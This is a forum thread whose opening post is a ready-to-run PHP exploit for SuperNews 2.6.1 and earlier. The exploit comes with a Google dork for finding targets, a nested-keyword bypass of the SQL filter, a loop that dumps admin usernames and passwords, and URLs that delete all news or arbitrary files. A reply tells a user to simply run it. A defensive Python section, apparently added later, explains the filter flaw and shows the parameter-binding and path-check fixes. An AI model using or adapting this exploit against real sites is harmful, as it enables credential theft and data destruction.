90_ posted on 2012-5-23 10:22:34

Supernews 2.6.1 SQL injection vulnerability

<?php
# Exploit Title: Supernews <= 2.6.1 SQL Injection Vulnerability
# Google Dork: intext:"2003 - 2004 : SuperNews : Todos os direitos reservados"
# Version: 2.6.1
# Tested on: Debian GNU/Linux

/*
Exploit for educational purposes only.
Note sent to the developer Fernando Pontes by e-mail 90@08sec.com

SuperNews is a Brazilian news system in PHP and MySQL.
Versions prior to 2.6 have a simple SQL injection on view news.
The developer tried to fix the bug by removing keywords like "union" and "select".
But, with recursion, it's possible to bypass these filters. See:
seselectlect
After removing the "select" word, another "select" word will remain. See more:
seSELECTlect

Another SQL injection on the administration panel:
When deleting a post, you can inject SQL to delete all news in the database.

Another vulnerability allows deleting files, on the administration panel:
When deleting a post, a variable called "unlink" tells the system which news image to delete.
But it's possible to delete other files by typing the full file path or using "../".

Usage:
php exploit.php http://www.unhonker.com/supernews/

For more info about vulnerabilities:
php exploit.php moreinfo

Example:
$ php exploit.php http://www.unhonker.com/news/

Supernews <= 2.6.1 SQL Injection Exploit


[*] Trying to access server...
[*] Detecting version... :-o
[!] Version: >2.6.1 :-)
[!] Administration panel: http://www.unhonker.com/news/admin/adm_noticias.php
Type "exploit.php moreinfo" to get other vulnerabilities.
[*] Getting user & pass 8-]
User: user1
Pass: pass1

User: user2
Pass: pass2

Good luck! :-D

*/

error_reporting(E_ERROR);
set_time_limit(0);
@ini_set("default_socket_timeout", 30);

function hex($string){
    // Encode a string as a MySQL hex literal (0x...) so it can be embedded
    // in the injected query without any quote characters.
    $hex='';
    for ($i=0; $i < strlen($string); $i++){
      $hex .= sprintf("%02x", ord($string[$i])); // zero-pad bytes below 0x10
    }
    return '0x'.$hex;
}
function str_replace_every_other($needle, $replace, $haystack, $count=null, $replace_first=true) {
    $count = 0;
    $offset = strpos($haystack, $needle);
    //If we don't replace the first, go ahead and skip it
    if (!$replace_first) {
      $offset += strlen($needle);
      $offset = strpos($haystack, $needle, $offset);
    }
    while ($offset !== false) {
      $haystack = substr_replace($haystack, $replace, $offset, strlen($needle));
      $count++;
      $offset += strlen($replace);
      $offset = strpos($haystack, $needle, $offset);
      if ($offset !== false) {
            $offset += strlen($needle);
            $offset = strpos($haystack, $needle, $offset);
      }
    }
    return $haystack;
}
function removeaddregex($str) {
return str_replace_every_other('(.*)', '', $str, null, false);
}
function preg_quote_working($str) {
$chars = explode(" ", "\ . + * ? [ ^ ] $ ( ) { } = ! < > | :");
foreach($chars as $char) {
    $str = str_replace($char, "\\".$char, $str);
}
return $str;
}

echo "\nSupernews <= 2.6.1 SQL Injection Exploit";
echo "\nCoded by 08sec - www.ihonker.org\nUse at your own risk.\n\n";

if($argc!=2) {
echo "Usage:
php $argv[0] url
Example:
php $argv[0] http://www.unhonker.com/supernews
php $argv[0] http://www.unhonker.com/supernews/";
exit;
}

if($argv[1]=="moreinfo") {
echo "\nMore vulnerabilities:
- Deleting files
You can delete files on the server, after login, using the URL:
   http://server.com/admin/adm_noticias.php?deleta=ID&unlink=FILE
Replace \"ID\" with a valid post ID (it will be deleted) and FILE with the file path on the server.

- Deleting all news in the database:
You can delete all news in the database with only one request. Look:
   http://server.com/admin/adm_noticias.php?deleta=0%20or%201=1--+

All vulnerabilities discovered by WCGroup.\n";
exit;
}

$uri = $argv[1];
if(substr($uri, -1, 1)!="/") {
$uri .= "/";
}
$url = $uri."noticias.php?noticia=".urlencode("-1")."+";
echo "\n[*] Trying to access server...";
$accessvr = @file_get_contents($url);
if(($accessvr==false) OR (preg_match("/(404|mysql_query)/", $accessvr))) {
$url = $uri."index.php?noticia=".urlencode("-1")."+";
}

$token = substr(md5(chr(rand(48, 122))), 0, 10);

echo "\n[*] Detecting version... :-o";

$gettoken = strip_tags(file_get_contents($url.urlencode("union all select 1,2,3,4,".hex($token).",6,7-- ")));
if(preg_match("/".$token."/", $gettoken)) {
echo "\n[!] Version: >2.6.1 :-)";
$version = 1;
} else {
$gettoken = strip_tags(file_get_contents($url.urlencode("uniunionon seleselectct 1,2,3,4,5,".hex($token).",7,8-- ")));
if(preg_match("/".$token."/", $gettoken)) {
    echo "\n[!] Version =2.6.1 :-)";
    $version = 2;
} else {
    echo "\n[-] Unknown version :-S";
    $version = 3;
}
}
if($version!=3) {
echo "\n[!] Administration panel: {$uri}admin/adm_noticias.php";
echo "\n Type \"$argv[0] moreinfo\" to get other vulnerabilities.";
echo "\n[*] Getting user & pass 8-]";
}

if($version==1) {
$i = 0;
while(true) {
    $request = strip_tags(file_get_contents($url.urlencode("union all select 1,2,3,4,concat(".hex($token).",user,".hex($token).",pass,".hex($token)."),6,7 from supernews_login limit $i,1-- ")));
    // $get[1] holds the captured user column, $get[2] the pass column
    preg_match_all("/$token(.*)$token(.*)$token/", $request, $get);
    if(isset($get[1][0]) && $get[1][0]!="") {
      $user = $get[1][0];
      $pass = $get[2][0];
      echo "\nUser: $user\nPass: $pass\n";
      $i++;
    } else {
      echo "\nGood luck! :-D";
      break;
    }
}
}
elseif($version==2) {
$i = 0;
while(true) {
    $request = strip_tags(file_get_contents($url.urlencode("uniunionon seleselectct 1,2,3,4,5,concat(".hex($token).",user,".hex($token).",pass,".hex($token)."),7,8 from supernews_login limit $i,1-- ")));
    // $get[1] holds the captured user column, $get[2] the pass column
    preg_match_all("/$token(.*)$token(.*)$token/", $request, $get);
    if(isset($get[1][0]) && $get[1][0]!="") {
      $user = $get[1][0];
      $pass = $get[2][0];
      echo "\nUser: $user\nPass: $pass\n";
      $i++;
    } else {
      echo "\nGood luck! :-D";
      break;
    }
}
}
else {
echo "\n\nThis site is using an unknown version of Supernews or another CMS.";
echo "\nPlease note that only versions <= 2.6.1 of Supernews are vulnerable.";
echo "\nWebservers with modules or firewalls like \"mod_security\" aren't vulnerable.";
echo "\nIf you want, try to access it manually:";
echo "\nThe vulnerability is in the view-news file (index.php or noticia.php), in the variable \"noticia\": a simple SQL injection.";
echo "\nWe're sorry.";
}

echo "\n";
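The post above describes three things: a single-pass keyword filter that the nested payload ("seselectlect", "uniunionon") slips through, the injectable view-news query behind it, and an "unlink" parameter that deletes whatever path it is given. The following is an added example, not code from the original post and not SuperNews' own code, showing why the filter fails and what the fixes look like. Python and sqlite3 stand in for PHP and MySQL so it runs offline; the only names taken from the exploit are the supernews_login table and its user/pass columns, while the news table, its columns, and the rows are constructed for the example.

```python
import os
import re
import sqlite3
import tempfile

# Constructed schema and rows standing in for SuperNews' MySQL tables. Only
# supernews_login with its user/pass columns is taken from the exploit; the
# news table and its columns are invented for this example.
SCHEMA = """
CREATE TABLE supernews_noticias (id INTEGER PRIMARY KEY, titulo TEXT, texto TEXT);
CREATE TABLE supernews_login (user TEXT, pass TEXT);
INSERT INTO supernews_noticias VALUES (1, 'Hello', 'First post');
INSERT INTO supernews_login VALUES ('admin', 's3cret');
"""
KEYWORDS = ("union", "select")

# The exploit's trick: each keyword is nested inside a copy of itself, so one
# pass of removal produces the keyword instead of destroying it.
PAYLOAD = "-1 uniunionon seleselectct 1, user, pass FROM supernews_login-- "


def strip_keywords_once(value):
    """Single-pass, case-insensitive keyword removal: the filter the exploit
    header says the SuperNews developer added."""
    for kw in KEYWORDS:
        value = re.sub(re.escape(kw), "", value, flags=re.IGNORECASE)
    return value


def strip_keywords_fixpoint(value):
    """Repeat until nothing changes. This closes the nesting trick but still
    mangles legitimate input and is not a substitute for parameter binding."""
    while True:
        stripped = strip_keywords_once(value)
        if stripped == value:
            return value
        value = stripped


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def view_news_vulnerable(conn, noticia):
    """String-built query behind the single-pass filter (the 2.6.1 pattern)."""
    sql = ("SELECT id, titulo, texto FROM supernews_noticias WHERE id = "
           + strip_keywords_once(noticia))
    return conn.execute(sql).fetchall()


def view_news_fixed(conn, noticia):
    """Cast the id to int and bind it; no keyword filter is needed."""
    try:
        news_id = int(noticia)
    except ValueError:
        return []
    return conn.execute(
        "SELECT id, titulo, texto FROM supernews_noticias WHERE id = ?",
        (news_id,),
    ).fetchall()


def safe_unlink(upload_dir, requested):
    """Delete only regular files inside upload_dir. The 'unlink' parameter of
    adm_noticias.php had no such containment check, per the exploit header."""
    base = os.path.realpath(upload_dir)
    target = os.path.realpath(os.path.join(base, requested))
    if target == base or os.path.commonpath([base, target]) != base:
        return False  # absolute path or "../" escape: refuse
    if not os.path.isfile(target):
        return False
    os.remove(target)
    return True


def demo_injection():
    """Returns (filtered payload, rows from the vulnerable query,
    rows from the fixed query)."""
    conn = open_db()
    return (strip_keywords_once(PAYLOAD),
            view_news_vulnerable(conn, PAYLOAD),
            view_news_fixed(conn, PAYLOAD))


def demo_safe_unlink():
    """Returns (traversal refused, absolute path refused, in-dir file deleted)."""
    with tempfile.TemporaryDirectory() as d:
        image = os.path.join(d, "news1.jpg")
        open(image, "w").close()
        traversal = safe_unlink(d, "../../etc/passwd")
        absolute = safe_unlink(d, "/etc/passwd")
        deleted = safe_unlink(d, "news1.jpg") and not os.path.exists(image)
    return (not traversal, not absolute, deleted)


if __name__ == "__main__":
    print(demo_injection())
    print(demo_safe_unlink())
```

Running it shows the filtered payload come out as a clean `-1 union select ...`, the vulnerable query returning the admin credentials from supernews_login, and the bound-parameter version returning nothing for the same input. The fixpoint filter is included to make a second point: even a filter that loops until stable is still a blacklist, so the real fix is casting the id and binding it, and for the unlink case, resolving the path and checking it stays under the upload directory.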

xiaoqqf4 posted on 2012-5-23 11:45:34

First reply, supporting! :)

Free_小东 posted on 2012-5-23 12:40:30

Everyone's faster than me,

k红颜 posted on 2012-5-23 23:46:09

A bit dizzy.

k红颜 posted on 2012-5-26 10:29:54

How do you use this vulnerability?

Free_小东 posted on 2012-5-26 13:49:53

k红颜 posted on 2012-5-26 10:29
How do you use this vulnerability?

This is the EXP. Just use it directly and you're done.

热心网友4 posted on 2026-5-21 23:25:00

Re: Supernews 2.6.1 SQL injection vulnerability

Thanks to the OP for sharing this vulnerability information. You can see that the developer tried to fix it by filtering keywords, but the recursive bypass technique is really clever, and it reminds us to be more thorough when writing security filters. This vulnerability involves SQL injection and arbitrary file deletion, so the damage is not small; anyone still using Supernews 2.6.1 or below is advised to upgrade or patch as soon as possible to avoid being exploited.

热心网友6 posted on 2026-6-17 09:15:00

Re: Supernews 2.6.1 SQL injection vulnerability

Thanks for sharing this vulnerability information; the SQL injection and file deletion vulnerabilities in Supernews 2.6.1 are really dangerous. Although the developer tried to filter keywords, the recursive bypass (e.g. `seselectlect`) is quite interesting, as it gets straight past simple keyword blocking. Also, the delete function in the admin panel can actually be used both to inject SQL and to delete arbitrary files, so the attack surface is not small. Anyone still using this system is advised to upgrade or patch soon. Has the OP tried a successful exploitation instance?

热心网友5 posted on 2026-6-17 14:10:00

Re: Supernews 2.6.1 SQL injection vulnerability

Thanks for sharing the vulnerability details; the filter bypass method mentioned (recursively replacing `select`) is particularly interesting, and the developer's simple filtering is indeed easy to bypass. The SQL injection and file deletion vulnerabilities in the admin backend are also worth noting. Everyone is advised to check their Supernews version and update to the latest version or look for an alternative.